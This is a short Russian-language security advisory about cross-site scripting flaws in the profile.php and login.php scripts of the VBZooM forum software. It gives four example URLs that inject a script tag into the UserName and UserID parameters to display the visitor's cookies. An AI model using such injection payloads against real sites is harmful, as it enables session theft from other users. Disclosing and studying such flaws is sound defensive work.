Программа: VBZooM
Обнаруженная уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость существует в сценариях 'profile.php' и 'login.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
http://[target]/vbzoom/profile.php?UserID=1&UserName= <br><script>alert(document.coo kie);</script>
http://[target]/vbzoom/login.php?UserID='<br><script> alert(document.cookie);</script>
http://[target]/vz/profile.php?UserID=1&UserName= <br><script>al ert(document.cookie);</script>
http://[target]/vz/login.php?UserID='<br><script> alert(document.cookie);</script>
